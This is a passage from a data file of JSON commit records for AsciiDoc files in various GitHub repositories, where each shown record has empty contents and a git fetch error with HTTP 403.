document\n","repos":"aparnachaudhary\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/nagios-plugin-jbossas7.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"38d504a6b30e296f0174deafcf2878d87ab9b557","subject":"Update 2015-11-02-Multiples-of-3-and-5.adoc","message":"Update 2015-11-02-Multiples-of-3-and-5.adoc","repos":"Bulletninja\/bulletninja.github.io,Bulletninja\/bulletninja.github.io,Bulletninja\/bulletninja.github.io,Bulletninja\/bulletninja.github.io","old_file":"_posts\/2015-11-02-Multiples-of-3-and-5.adoc","new_file":"_posts\/2015-11-02-Multiples-of-3-and-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bulletninja\/bulletninja.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34c224b4a4ea77f9c61a91e7a22342f16f54a4fb","subject":"y2b create post Never Thought I'd See The Day...","message":"y2b create post Never Thought I'd See The Day...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-29-Never-Thought-Id-See-The-Day.adoc","new_file":"_posts\/2017-06-29-Never-Thought-Id-See-The-Day.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8d69da2a393ee13a0f1cd6921b95457f6ca8fca","subject":"Update 2017-06-30-First-work-of-my-data-sience.adoc","message":"Update 2017-06-30-First-work-of-my-data-sience.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d3810df548e1edd88b7b8a68703362b590dca6a","subject":"SOLR-12740: migration docs","message":"SOLR-12740: migration docs\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"solr\/solr-ref-guide\/src\/migrate-to-policy-rule.adoc","new_file":"solr\/solr-ref-guide\/src\/migrate-to-policy-rule.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/solr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"921e84e305cc26a302cc91bfa98b02342a0a41f3","subject":"Update 2017-09-05-Mini.adoc","message":"Update 2017-09-05-Mini.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-09-05-Mini.adoc","new_file":"_posts\/2017-09-05-Mini.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08ef54710c07933297291a7ed824808aff3f0e3c","subject":"add clojurebridge pittsburgh","message":"add clojurebridge pittsburgh\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2016\/clojurebridge_pittsburgh.adoc","new_file":"content\/events\/2016\/clojurebridge_pittsburgh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f1af46ca73ad5e5ae87282dc47a15c74c5310908","subject":"Details auto inst","message":"Details auto inst\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff917d83ac8b08ff178908b4332201e2bf3a449c","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96bfd407f71c500c88978426d9ffd99415d15452","subject":"Update 2015-08-12-Firefox-OS-on-a-High-End-Device.adoc","message":"Update 2015-08-12-Firefox-OS-on-a-High-End-Device.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2015-08-12-Firefox-OS-on-a-High-End-Device.adoc","new_file":"_posts\/2015-08-12-Firefox-OS-on-a-High-End-Device.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1226400ff14d92fe45cb85487633a235617bff4","subject":"Update 2015-10-06-OCRWC-and-beyond.adoc","message":"Update 2015-10-06-OCRWC-and-beyond.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-10-06-OCRWC-and-beyond.adoc","new_file":"_posts\/2015-10-06-OCRWC-and-beyond.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d668293f1d85f453cffe52939259c6db3df7e3d","subject":"Update 2017-10-05-First-Blog-Entry.adoc","message":"Update 2017-10-05-First-Blog-Entry.adoc","repos":"shutas\/shutas.github.io,shutas\/shutas.github.io,shutas\/shutas.github.io,shutas\/shutas.github.io","old_file":"_posts\/2017-10-05-First-Blog-Entry.adoc","new_file":"_posts\/2017-10-05-First-Blog-Entry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shutas\/shutas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4494a1dea43d0f5201f5e88abd3a1c30001bbbbf","subject":"Rm Web descriptor stuff","message":"Rm Web descriptor stuff\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Maven\/Best practices.adoc","new_file":"Maven\/Best practices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2ee21cb51c309950f0bbf2393c7361d00dd45b3","subject":"Update 2015-03-15-Update-Whats-new-in-Version-020.adoc","message":"Update 2015-03-15-Update-Whats-new-in-Version-020.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/2015-03-15-Update-Whats-new-in-Version-020.adoc","new_file":"_posts\/2015-03-15-Update-Whats-new-in-Version-020.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6359801e039016074837af6a4653cf4ffdb9e6b1","subject":"Update 2015-03-22-Welcome-and-Hello.adoc","message":"Update 2015-03-22-Welcome-and-Hello.adoc","repos":"mdinaustin\/mdinaustin.github.io,mdinaustin\/mdinaustin.github.io,mdinaustin\/mdinaustin.github.io","old_file":"_posts\/2015-03-22-Welcome-and-Hello.adoc","new_file":"_posts\/2015-03-22-Welcome-and-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdinaustin\/mdinaustin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff2afbd4e0b467b42e347e125a1da5306ee20654","subject":"Update 2015-11-18-New-in-the-family.adoc","message":"Update 2015-11-18-New-in-the-family.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-11-18-New-in-the-family.adoc","new_file":"_posts\/2015-11-18-New-in-the-family.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"575335cc5a772eff350e0ce1e14cb49fd81a05ee","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5babf6b9b83a5bfc74afd33ddbeb232644344692","subject":"Update 2015-04-17-React.adoc","message":"Update 2015-04-17-React.adoc","repos":"hatohato25\/hatohato25.github.io,hatohato25\/hatohato25.github.io,hatohato25\/hatohato25.github.io","old_file":"_posts\/2015-04-17-React.adoc","new_file":"_posts\/2015-04-17-React.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hatohato25\/hatohato25.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"269df510c87d7c318a474bd8c1e8037a1f05785b","subject":"Update 2015-08-08-Hello.adoc","message":"Update 2015-08-08-Hello.adoc","repos":"imukulsharma\/imukulsharma.github.io,imukulsharma\/imukulsharma.github.io,imukulsharma\/imukulsharma.github.io","old_file":"_posts\/2015-08-08-Hello.adoc","new_file":"_posts\/2015-08-08-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/imukulsharma\/imukulsharma.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eda5517865f9c975c8c2882b52b8aa7738dc5799","subject":"Update 2016-11-24-G-A-S.adoc","message":"Update 2016-11-24-G-A-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-24-G-A-S.adoc","new_file":"_posts\/2016-11-24-G-A-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd0e0ca3c317716f80700f68d988c2361560528e","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7934776b5306542b231d9c18e69f631a40cb7b1d","subject":"Link 2","message":"Link 2\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Maven.adoc","new_file":"Best practices\/Maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"952d6911156449e950ff58671a259cc5a662e16e","subject":"Facets README","message":"Facets README\n","repos":"oscerd\/core,D9110\/core,D9110\/core,forge\/core,ivannov\/core,ivannov\/core,pplatek\/core,ivannov\/core,agoncal\/core,ivannov\/core,oscerd\/core,jerr\/jbossforge-core,oscerd\/core,pplatek\/core,oscerd\/core,ivannov\/core,jerr\/jbossforge-core,pplatek\/core,oscerd\/core,jerr\/jbossforge-core,agoncal\/core,pplatek\/core,agoncal\/core,oscerd\/core,pplatek\/core,forge\/core,agoncal\/core,forge\/core,ivannov\/core,forge\/core,forge\/core,jerr\/jbossforge-core,agoncal\/core,pplatek\/core,jerr\/jbossforge-core,ivannov\/core,pplatek\/core,pplatek\/core,ivannov\/core,oscerd\/core,ivannov\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,pplatek\/core,pplatek\/core,forge\/core,oscerd\/core,D9110\/core,agoncal\/core,jerr\/jbossforge-core,stalep\/forge-core,D9110\/core,forge\/core,oscerd\/core,oscerd\/core,agoncal\/core,D9110\/core,agoncal\/core,D9110\/core,forge\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,agoncal\/core,agoncal\/core,D9110\/core,forge\/core,D9110\/core,stalep\/forge-core,ivannov\/core,D9110\/core,D9110\/core,forge\/core","old_file":"facets\/README.asciidoc","new_file":"facets\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivannov\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a2fd1b9f6dbd289d20cc151432f30f741b3b20f5","subject":"No more using 'hybrid mmapfs \/ niofs' (#25944)","message":"No more using 'hybrid mmapfs \/ niofs' (#25944)\n\nIt looks a bit ambiguous here.\r\n\r\nElasticSearch no more using 'hybrid mmapfs \/ niofs' which chooses filesystem based on the file. It is any one of the mmapfs, niofs or simplefs depending on the operating system.\r\nAs quoted here https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/5.5\/index-modules-store.html\r\n\r\nThanks,\r\nPulkit Agrawal","repos":"GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,masaruh\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,mohit\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,markwalkom\/elasticsearch,scottsom\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,mjason3\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,kalimatas\/elasticsearch,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,scottsom\/elasticsearch,fred84\/elasticsearch,maddin2016\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,masaruh\/elasticsearch,wangtuo\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,brandonkearby\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,markwalkom\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,shreejay\/elasticsearch,lks21c\/elasticsearch,mohit\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,shreejay\/elasticsearch,masaruh\/elasticsearch,sneivandt\/elasticsearch,scorpionvicky\/elasticsearch,pozhidaevak\/elasticsearch,kalimatas\/elasticsearch,mohit\/elasticsearch,umeshdangat\/elasticsearch,markwalkom\/elasticsearch,s1monw\/elasticsearch,wangtuo\/elasticsearch,brandonkearby\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,HonzaKral\/elasticsearch,umeshdangat\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,robin13\/elasticsearch,masaruh\/elasticsearch,qwerty4030\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,umeshdangat\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,wenpos\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,markwalkom\/elasticsearch,mohit\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wenpos\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,wangtuo\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,umeshdangat\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,mohit\/elasticsearch,mjason3\/elasticsearch,s1monw\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch","old_file":"docs\/reference\/setup\/sysconfig\/virtual-memory.asciidoc","new_file":"docs\/reference\/setup\/sysconfig\/virtual-memory.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"99645f901b89ac817dee7b2e44c7a544ddbcfb3f","subject":"Adds readme to stdlib\/templates","message":"Adds readme to stdlib\/templates\n","repos":"gerdstolpmann\/ocaml,gerdstolpmann\/ocaml,gerdstolpmann\/ocaml,gerdstolpmann\/ocaml,gerdstolpmann\/ocaml","old_file":"stdlib\/templates\/README.adoc","new_file":"stdlib\/templates\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gerdstolpmann\/ocaml.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"0495a7014909bca900dbc922c125323f4b073336","subject":"Update 2017-07-31-Clips.adoc","message":"Update 2017-07-31-Clips.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-07-31-Clips.adoc","new_file":"_posts\/2017-07-31-Clips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"033caab1792e48c159ec6bf2e7c123cd3bfa12b4","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ec85eec3ff3ecc93e50db1ca7125d87449fc396","subject":"Document the need to re-download the repository list file to upgrade on Ubuntu","message":"Document the need to re-download the repository list file to upgrade on Ubuntu\n\nChange-Id: If342b3c820d1acb16e45ab3e9155565559b51075\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2530\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"551271278f3349fda2e25db9fbf9a2a0b8c95a2c","subject":"Update 2015-09-18-On-the-road-to-better-Javascript-with-Setters-and-Getters.adoc","message":"Update 2015-09-18-On-the-road-to-better-Javascript-with-Setters-and-Getters.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-09-18-On-the-road-to-better-Javascript-with-Setters-and-Getters.adoc","new_file":"_posts\/2015-09-18-On-the-road-to-better-Javascript-with-Setters-and-Getters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e43fc0ed819e14f333ce566e34bcabb5642d0b6a","subject":"FORGE-2244: Created README for scaffold addon","message":"FORGE-2244: Created README for scaffold addon","repos":"forge\/core,agoncal\/core,forge\/core,pplatek\/core,agoncal\/core,D9110\/core,ivannov\/core,D9110\/core,jerr\/jbossforge-core,forge\/core,pplatek\/core,agoncal\/core,jerr\/jbossforge-core,D9110\/core,agoncal\/core,oscerd\/core,ivannov\/core,agoncal\/core,forge\/core,jerr\/jbossforge-core,ivannov\/core,jerr\/jbossforge-core,forge\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,ivannov\/core,oscerd\/core,pplatek\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,D9110\/core,oscerd\/core,oscerd\/core,D9110\/core,oscerd\/core,agoncal\/core,forge\/core,pplatek\/core,pplatek\/core,oscerd\/core,D9110\/core,pplatek\/core,forge\/core,agoncal\/core,ivannov\/core,D9110\/core,D9110\/core,pplatek\/core,oscerd\/core,ivannov\/core,ivannov\/core,jerr\/jbossforge-core,pplatek\/core,agoncal\/core,ivannov\/core,forge\/core,forge\/core,D9110\/core,oscerd\/core,oscerd\/core,agoncal\/core,D9110\/core,jerr\/jbossforge-core,pplatek\/core,ivannov\/core,pplatek\/core,agoncal\/core,forge\/core,ivannov\/core,oscerd\/core","old_file":"scaffold\/README.asciidoc","new_file":"scaffold\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/D9110\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a78545f8327d437e76d6f81003078b9ca8c39492","subject":"Updated version and release date on doc index","message":"Updated version and release date on doc index\n","repos":"Stranger6667\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"342412a3d074c0fecfc52db2b8d6bfa0a7b67902","subject":"revised and added initial info on filters","message":"revised and added initial info on filters\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ad56d3dbf24b8cdac630b3aaa171b0e162c2c47e","subject":"Renamed batch_runtime_lifecycle","message":"Renamed batch_runtime_lifecycle\n","repos":"sidgoyal\/standards.jsr352.tck,WASdev\/standards.jsr352.tck,doctorbatch\/standards.jsr352.tck,doctorbatch\/standards.jsr352.tck,goldenryan\/standards.jsr352.tck","old_file":"specification\/job_runtime_lifecycle.adoc","new_file":"specification\/job_runtime_lifecycle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/goldenryan\/standards.jsr352.tck.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b71b6804f3ac43d2210b66e549b120c5e076fe0","subject":"2016-10-28-Anfang.adoc","message":"2016-10-28-Anfang.adoc\n","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-10-28-Anfang.adoc","new_file":"_posts\/2016-10-28-Anfang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a38f6170abe3ca138636b4a04964f5bf3aae1a12","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8670dd95676c098510edc79760d5a9aedbe68d08","subject":"Update 2018-07-30-P-H-P.adoc","message":"Update 2018-07-30-P-H-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-30-P-H-P.adoc","new_file":"_posts\/2018-07-30-P-H-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"510e3118412fb69e23d5818f6509ad7beca3aa2d","subject":"Update 2015-12-21-Flask-Template.adoc","message":"Update 